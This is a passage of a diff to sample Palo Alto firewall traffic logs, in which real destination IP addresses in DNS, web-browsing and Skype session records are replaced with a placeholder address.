09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 